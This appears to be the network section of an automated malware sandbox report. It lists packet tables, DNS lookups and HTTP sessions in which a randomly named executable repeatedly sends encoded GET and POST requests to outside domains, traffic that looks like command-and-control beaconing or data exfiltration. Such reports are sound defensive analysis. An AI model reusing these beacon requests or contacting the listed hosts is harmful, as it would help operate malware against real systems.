                                                                                            Nov 6, 2024 16:07:04.230225086 CET4998280192.168.2.6216.40.34.41
                                                                                            Nov 6, 2024 16:07:04.238265038 CET4998280192.168.2.6216.40.34.41
                                                                                            Nov 6, 2024 16:07:04.244195938 CET8049982216.40.34.41192.168.2.6
                                                                                            Nov 6, 2024 16:07:04.913957119 CET8049982216.40.34.41192.168.2.6
                                                                                            Nov 6, 2024 16:07:04.913980007 CET8049982216.40.34.41192.168.2.6
                                                                                            Nov 6, 2024 16:07:04.913992882 CET8049982216.40.34.41192.168.2.6
                                                                                            Nov 6, 2024 16:07:04.914089918 CET4998280192.168.2.6216.40.34.41
                                                                                            Nov 6, 2024 16:07:04.914166927 CET8049982216.40.34.41192.168.2.6
                                                                                            Nov 6, 2024 16:07:04.914180040 CET8049982216.40.34.41192.168.2.6
                                                                                            Nov 6, 2024 16:07:04.914215088 CET4998280192.168.2.6216.40.34.41
                                                                                            Nov 6, 2024 16:07:04.914280891 CET8049982216.40.34.41192.168.2.6
                                                                                            Nov 6, 2024 16:07:04.914324045 CET4998280192.168.2.6216.40.34.41
                                                                                            Nov 6, 2024 16:07:04.955483913 CET8049982216.40.34.41192.168.2.6
                                                                                            Nov 6, 2024 16:07:04.955667973 CET4998280192.168.2.6216.40.34.41
                                                                                            Nov 6, 2024 16:07:04.960346937 CET4998280192.168.2.6216.40.34.41
                                                                                            Nov 6, 2024 16:07:04.965152025 CET8049982216.40.34.41192.168.2.6
                                                                                            Nov 6, 2024 16:07:20.029256105 CET4998580192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:20.034141064 CET80499853.33.130.190192.168.2.6
                                                                                            Nov 6, 2024 16:07:20.034265995 CET4998580192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:20.045763969 CET4998580192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:20.050704002 CET80499853.33.130.190192.168.2.6
                                                                                            Nov 6, 2024 16:07:20.691303015 CET80499853.33.130.190192.168.2.6
                                                                                            Nov 6, 2024 16:07:20.691584110 CET4998580192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:21.551594019 CET4998580192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:21.556680918 CET80499853.33.130.190192.168.2.6
                                                                                            Nov 6, 2024 16:07:22.577330112 CET4998680192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:22.582300901 CET80499863.33.130.190192.168.2.6
                                                                                            Nov 6, 2024 16:07:22.582464933 CET4998680192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:22.596735001 CET4998680192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:22.601934910 CET80499863.33.130.190192.168.2.6
                                                                                            Nov 6, 2024 16:07:23.239454985 CET80499863.33.130.190192.168.2.6
                                                                                            Nov 6, 2024 16:07:23.239547968 CET4998680192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:24.098309994 CET4998680192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:24.103247881 CET80499863.33.130.190192.168.2.6
                                                                                            Nov 6, 2024 16:07:25.117356062 CET4998780192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:25.122410059 CET80499873.33.130.190192.168.2.6
                                                                                            Nov 6, 2024 16:07:25.122550011 CET4998780192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:25.133986950 CET4998780192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:25.139616966 CET80499873.33.130.190192.168.2.6
                                                                                            Nov 6, 2024 16:07:25.140800953 CET80499873.33.130.190192.168.2.6
                                                                                            Nov 6, 2024 16:07:25.780488014 CET80499873.33.130.190192.168.2.6
                                                                                            Nov 6, 2024 16:07:25.780692101 CET4998780192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:26.645097017 CET4998780192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:26.650295973 CET80499873.33.130.190192.168.2.6
                                                                                            Nov 6, 2024 16:07:27.668977976 CET4998880192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:27.673952103 CET80499883.33.130.190192.168.2.6
                                                                                            Nov 6, 2024 16:07:27.674115896 CET4998880192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:27.681979895 CET4998880192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:27.687014103 CET80499883.33.130.190192.168.2.6
                                                                                            Nov 6, 2024 16:07:28.308826923 CET80499883.33.130.190192.168.2.6
                                                                                            Nov 6, 2024 16:07:28.309113026 CET80499883.33.130.190192.168.2.6
                                                                                            Nov 6, 2024 16:07:28.309361935 CET4998880192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:28.316713095 CET4998880192.168.2.63.33.130.190
                                                                                            Nov 6, 2024 16:07:28.322422028 CET80499883.33.130.190192.168.2.6
                                                                                            Nov 6, 2024 16:07:34.905452013 CET4998980192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:34.910547018 CET8049989192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:34.910680056 CET4998980192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:34.931627035 CET4998980192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:34.936631918 CET8049989192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:35.910486937 CET8049989192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:35.957532883 CET4998980192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:36.097170115 CET8049989192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:36.097475052 CET4998980192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:36.442017078 CET4998980192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:37.461349964 CET4999080192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:37.466985941 CET8049990192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:37.467117071 CET4999080192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:37.477932930 CET4999080192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:37.483870983 CET8049990192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:38.509207964 CET8049990192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:38.551301003 CET4999080192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:38.704174995 CET8049990192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:38.704351902 CET4999080192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:38.988936901 CET4999080192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:40.014602900 CET4999180192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:40.019556046 CET8049991192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:40.019727945 CET4999180192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:40.030045986 CET4999180192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:40.034862995 CET8049991192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:40.035002947 CET8049991192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:41.202744007 CET8049991192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:41.229320049 CET8049991192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:41.229476929 CET4999180192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:41.535762072 CET4999180192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:42.554785967 CET4999280192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:42.559870005 CET8049992192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:42.559988022 CET4999280192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:42.567240000 CET4999280192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:42.572253942 CET8049992192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:43.562258005 CET8049992192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:43.613703966 CET4999280192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:43.760843039 CET8049992192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:43.761107922 CET4999280192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:43.764218092 CET4999280192.168.2.6192.197.113.67
                                                                                            Nov 6, 2024 16:07:43.769123077 CET8049992192.197.113.67192.168.2.6
                                                                                            Nov 6, 2024 16:07:48.947729111 CET4999480192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:48.952780008 CET8049994162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:48.952923059 CET4999480192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:48.976064920 CET4999480192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:48.980912924 CET8049994162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:49.640774012 CET8049994162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:49.679794073 CET8049994162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:49.679877043 CET4999480192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:50.489197969 CET4999480192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:51.514858007 CET4999580192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:51.519869089 CET8049995162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:51.519958019 CET4999580192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:51.534784079 CET4999580192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:51.539787054 CET8049995162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:52.223860025 CET8049995162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:52.263132095 CET8049995162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:52.263241053 CET4999580192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:53.051418066 CET4999580192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:54.084582090 CET4999680192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:54.089689016 CET8049996162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:54.091370106 CET4999680192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:54.105756044 CET4999680192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:54.110677958 CET8049996162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:54.111310005 CET8049996162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:54.792356968 CET8049996162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:54.831903934 CET8049996162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:54.832066059 CET4999680192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:56.176197052 CET4999680192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:57.195852995 CET4999780192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:57.201823950 CET8049997162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:57.203983068 CET4999780192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:57.210938931 CET4999780192.168.2.6162.0.225.218
                                                                                            Nov 6, 2024 16:07:57.215827942 CET8049997162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:57.941618919 CET8049997162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:57.981587887 CET8049997162.0.225.218192.168.2.6
                                                                                            Nov 6, 2024 16:07:57.981805086 CET4999780192.168.2.6162.0.225.218

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 6, 2024 16:06:57.938829899 CET5934653192.168.2.61.1.1.1
                                                                                            Nov 6, 2024 16:06:58.573411942 CET53593461.1.1.1192.168.2.6
                                                                                            Nov 6, 2024 16:07:03.586405039 CET5203153192.168.2.61.1.1.1
                                                                                            Nov 6, 2024 16:07:04.217112064 CET53520311.1.1.1192.168.2.6
                                                                                            Nov 6, 2024 16:07:20.012980938 CET4915253192.168.2.61.1.1.1
                                                                                            Nov 6, 2024 16:07:20.026736021 CET53491521.1.1.1192.168.2.6
                                                                                            Nov 6, 2024 16:07:33.342937946 CET5536153192.168.2.61.1.1.1
                                                                                            Nov 6, 2024 16:07:34.332990885 CET5536153192.168.2.61.1.1.1
                                                                                            Nov 6, 2024 16:07:34.897764921 CET53553611.1.1.1192.168.2.6
                                                                                            Nov 6, 2024 16:07:34.898325920 CET53553611.1.1.1192.168.2.6
                                                                                            Nov 6, 2024 16:07:48.779344082 CET5316053192.168.2.61.1.1.1
                                                                                            Nov 6, 2024 16:07:48.939687967 CET53531601.1.1.1192.168.2.6

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Nov 6, 2024 16:06:57.938829899 CET192.168.2.61.1.1.10x3bStandard query (0)www.uphc255.vipA (IP address)IN (0x0001)false
                                                                                            Nov 6, 2024 16:07:03.586405039 CET192.168.2.61.1.1.10x42a4Standard query (0)www.integritywork.shopA (IP address)IN (0x0001)false
                                                                                            Nov 6, 2024 16:07:20.012980938 CET192.168.2.61.1.1.10x9190Standard query (0)www.ontohealth.netA (IP address)IN (0x0001)false
                                                                                            Nov 6, 2024 16:07:33.342937946 CET192.168.2.61.1.1.10x20daStandard query (0)www.c6ytv.netA (IP address)IN (0x0001)false
                                                                                            Nov 6, 2024 16:07:34.332990885 CET192.168.2.61.1.1.10x20daStandard query (0)www.c6ytv.netA (IP address)IN (0x0001)false
                                                                                            Nov 6, 2024 16:07:48.779344082 CET192.168.2.61.1.1.10xfae6Standard query (0)www.sadey.infoA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Nov 6, 2024 16:06:58.573411942 CET1.1.1.1192.168.2.60x3bName error (3)www.uphc255.vipnonenoneA (IP address)IN (0x0001)false
                                                                                            Nov 6, 2024 16:07:04.217112064 CET1.1.1.1192.168.2.60x42a4No error (0)www.integritywork.shop216.40.34.41A (IP address)IN (0x0001)false
                                                                                            Nov 6, 2024 16:07:20.026736021 CET1.1.1.1192.168.2.60x9190No error (0)www.ontohealth.netontohealth.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Nov 6, 2024 16:07:20.026736021 CET1.1.1.1192.168.2.60x9190No error (0)ontohealth.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                            Nov 6, 2024 16:07:20.026736021 CET1.1.1.1192.168.2.60x9190No error (0)ontohealth.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                            Nov 6, 2024 16:07:34.897764921 CET1.1.1.1192.168.2.60x20daNo error (0)www.c6ytv.netc6ytv.net.huanxidx.buyusdt.meCNAME (Canonical name)IN (0x0001)false
                                                                                            Nov 6, 2024 16:07:34.897764921 CET1.1.1.1192.168.2.60x20daNo error (0)c6ytv.net.huanxidx.buyusdt.mehuanxidx.buyusdt.meCNAME (Canonical name)IN (0x0001)false
                                                                                            Nov 6, 2024 16:07:34.897764921 CET1.1.1.1192.168.2.60x20daNo error (0)huanxidx.buyusdt.mex105.jieruitech.infoCNAME (Canonical name)IN (0x0001)false
                                                                                            Nov 6, 2024 16:07:34.897764921 CET1.1.1.1192.168.2.60x20daNo error (0)x105.jieruitech.info192.197.113.67A (IP address)IN (0x0001)false
                                                                                            Nov 6, 2024 16:07:34.898325920 CET1.1.1.1192.168.2.60x20daNo error (0)www.c6ytv.netc6ytv.net.huanxidx.buyusdt.meCNAME (Canonical name)IN (0x0001)false
                                                                                            Nov 6, 2024 16:07:34.898325920 CET1.1.1.1192.168.2.60x20daNo error (0)c6ytv.net.huanxidx.buyusdt.mehuanxidx.buyusdt.meCNAME (Canonical name)IN (0x0001)false
                                                                                            Nov 6, 2024 16:07:34.898325920 CET1.1.1.1192.168.2.60x20daNo error (0)huanxidx.buyusdt.mex105.jieruitech.infoCNAME (Canonical name)IN (0x0001)false
                                                                                            Nov 6, 2024 16:07:34.898325920 CET1.1.1.1192.168.2.60x20daNo error (0)x105.jieruitech.info192.197.113.67A (IP address)IN (0x0001)false
                                                                                            Nov 6, 2024 16:07:48.939687967 CET1.1.1.1192.168.2.60xfae6No error (0)www.sadey.info162.0.225.218A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • www.integritywork.shop
                                                                                            • www.ontohealth.net
                                                                                            • www.c6ytv.net
                                                                                            • www.sadey.info

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.649982216.40.34.41803268C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 6, 2024 16:07:04.238265038 CET533OUTGET /r0a9/?8RN4oRq=ZYHb+yN+RN7ZtjbwI7SB23xqPJJsxDr8Rawhra04/gYnM82mZx5+8Ykp6tR7PNEw3bB584nn/0BLo1rj87ovLgV9i3rHjjPoDRBTQtWr7711poFsTmp7tSOMnBMqrIuiMn54qIs=&SBV8T=1lJpZfbXA4K HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            Host: www.integritywork.shop
                                                                                            User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
                                                                                            Nov 6, 2024 16:07:04.913957119 CET1236INHTTP/1.1 200 OK
                                                                                            x-frame-options: SAMEORIGIN
                                                                                            x-xss-protection: 1; mode=block
                                                                                            x-content-type-options: nosniff
                                                                                            x-download-options: noopen
                                                                                            x-permitted-cross-domain-policies: none
                                                                                            referrer-policy: strict-origin-when-cross-origin
                                                                                            content-type: text/html; charset=utf-8
                                                                                            etag: W/"6d62364cd49346e85abc37f82677fe9b"
                                                                                            cache-control: max-age=0, private, must-revalidate
                                                                                            x-request-id: 56569afc-790f-4c1f-a2f2-76a696fbd4e5
                                                                                            x-runtime: 0.006570
                                                                                            transfer-encoding: chunked
                                                                                            connection: close
                                                                                            Data Raw: 31 37 35 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED]
                                                                                            Data Ascii: 175D<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>integritywork.shop is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source
                                                                                            Nov 6, 2024 16:07:04.913980007 CET1236INData Raw: 3d 70 61 72 6b 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31
                                                                                            Data Ascii: =parked"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>integritywork.shop</h1><h2>is a totally awesome idea still being worked on.</h
                                                                                            Nov 6, 2024 16:07:04.913992882 CET1236INData Raw: 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 61 62 6f 75 74 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 41 62 6f 75 74 20 55 73 3c 2f 61 3e 3c
                                                                                            Data Ascii: i><a rel="nofollow" href="https://www.hover.com/about?source=parked">About Us</a></li><li><a rel="nofollow" href="https://help.hover.com/home?source=parked">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=parked">
                                                                                            Nov 6, 2024 16:07:04.914166927 CET1236INData Raw: 2c 30 20 2d 33 35 2e 31 38 36 39 36 2c 31 35 2e 37 35 33 36 35 20 2d 33 35 2e 31 38 36 39 36 2c 33 35 2e 31 38 35 32 35 20 30 2c 32 2e 37 35 37 38 31 20 30 2e 33 31 31 32 38 2c 35 2e 34 34 33 35 39 20 30 2e 39 31 31 35 35 2c 38 2e 30 31 38 37 35
                                                                                            Data Ascii: ,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.
                                                                                            Nov 6, 2024 16:07:04.914180040 CET848INData Raw: 39 74 32 37 39 20 31 31 35 74 32 37 39 20 2d 31 31 35 74 31 31 35 20 2d 32 37 39 7a 4d 31 32 37 30 20 31 30 35 30 71 30 20 2d 33 38 20 2d 32 37 20 2d 36 35 74 2d 36 35 20 2d 32 37 74 2d 36 35 20 32 37 74 2d 32 37 20 36 35 74 32 37 20 36 35 74 36
                                                                                            Data Ascii: 9t279 115t279 -115t115 -279zM1270 1050q0 -38 -27 -65t-65 -27t-65 27t-27 65t27 65t65 27t65 -27t27 -65zM768 1270 q-7 0 -76.5 0.5t-105.5 0t-96.5 -3t-103 -10t-71.5 -18.5q-50 -20 -88 -58t-58 -88q-11 -29 -18.5 -71.5t-10 -103t-3 -96.5t0 -105.5t0.5 -7
                                                                                            Nov 6, 2024 16:07:04.914280891 CET691INData Raw: 3e 0a 3c 6e 61 76 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 43 6f 70 79 72 69 67 68 74 20 26 63 6f 70 79 3b 20 32 30 32 34 20 48 6f 76 65 72 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70
                                                                                            Data Ascii: ><nav><ul><li>Copyright &copy; 2024 Hover</li><li><a rel="nofollow" href="https://www.hover.com/tos?source=parked">Terms of Service</a></li><li><a rel="nofollow" href="https://www.hover.com/privacy?source=parked">Privacy</a></li></ul></


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.6499853.33.130.190803268C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 6, 2024 16:07:20.045763969 CET787OUTPOST /xqh1/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Length: 212
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.ontohealth.net
                                                                                            Origin: http://www.ontohealth.net
                                                                                            Referer: http://www.ontohealth.net/xqh1/
                                                                                            User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
                                                                                            Data Raw: 38 52 4e 34 6f 52 71 3d 47 66 6b 70 57 31 36 77 64 67 53 36 69 46 32 39 57 64 2b 50 48 73 72 58 4c 33 33 63 78 6b 45 79 64 4b 31 38 69 4d 75 2b 48 48 6f 6a 70 46 49 79 47 75 6b 35 6a 4d 72 2b 4c 41 2f 4a 56 6e 43 55 42 48 76 6f 50 34 6b 4c 4f 75 45 75 55 59 50 4e 55 56 6e 39 6f 6c 42 7a 70 31 55 32 73 67 47 38 66 38 70 74 52 61 30 33 79 77 75 52 44 7a 53 73 2f 31 35 74 77 31 6b 36 71 37 31 5a 78 58 48 6c 76 74 51 43 76 79 43 30 70 78 63 49 67 6d 48 52 69 67 45 44 6f 6f 35 62 56 56 62 52 62 4e 39 51 4e 58 44 78 6c 7a 6a 55 58 76 44 53 43 48 66 38 76 4b 6f 57 2b 39 7a 6c 62 32 79 65 64 50 30 2f 70 79 36 51 4a 35 58 2f 71 34 6d 79
                                                                                            Data Ascii: 8RN4oRq=GfkpW16wdgS6iF29Wd+PHsrXL33cxkEydK18iMu+HHojpFIyGuk5jMr+LA/JVnCUBHvoP4kLOuEuUYPNUVn9olBzp1U2sgG8f8ptRa03ywuRDzSs/15tw1k6q71ZxXHlvtQCvyC0pxcIgmHRigEDoo5bVVbRbN9QNXDxlzjUXvDSCHf8vKoW+9zlb2yedP0/py6QJ5X/q4my


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.6499863.33.130.190803268C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 6, 2024 16:07:22.596735001 CET811OUTPOST /xqh1/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Length: 236
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.ontohealth.net
                                                                                            Origin: http://www.ontohealth.net
                                                                                            Referer: http://www.ontohealth.net/xqh1/
                                                                                            User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
                                                                                            Data Raw: 38 52 4e 34 6f 52 71 3d 47 66 6b 70 57 31 36 77 64 67 53 36 6a 6c 6d 39 5a 65 57 50 42 4d 72 59 45 58 33 63 2b 45 45 32 64 4b 35 38 69 4e 71 75 45 30 4d 6a 70 6c 34 79 48 74 38 35 6b 4d 72 2b 46 67 2f 49 59 48 43 50 42 48 6a 61 50 35 59 4c 4f 75 51 75 55 63 48 4e 55 6d 2f 38 75 31 42 78 76 31 55 34 6a 41 47 38 66 38 70 74 52 61 77 52 79 32 47 52 44 44 4f 73 39 55 35 69 36 56 6b 39 6a 62 31 5a 31 58 48 70 76 74 52 58 76 7a 75 4f 70 33 59 49 67 69 44 52 69 78 45 43 68 6f 35 64 52 56 61 4e 63 39 30 6e 46 48 54 31 6a 56 37 52 58 39 76 6e 44 78 65 6d 7a 35 6f 31 73 74 54 6e 62 30 71 73 64 76 30 56 72 79 43 51 62 75 62 59 6c 4d 44 52 79 45 39 54 48 72 7a 30 73 50 4d 79 45 54 34 6f 6b 75 69 50 48 41 3d 3d
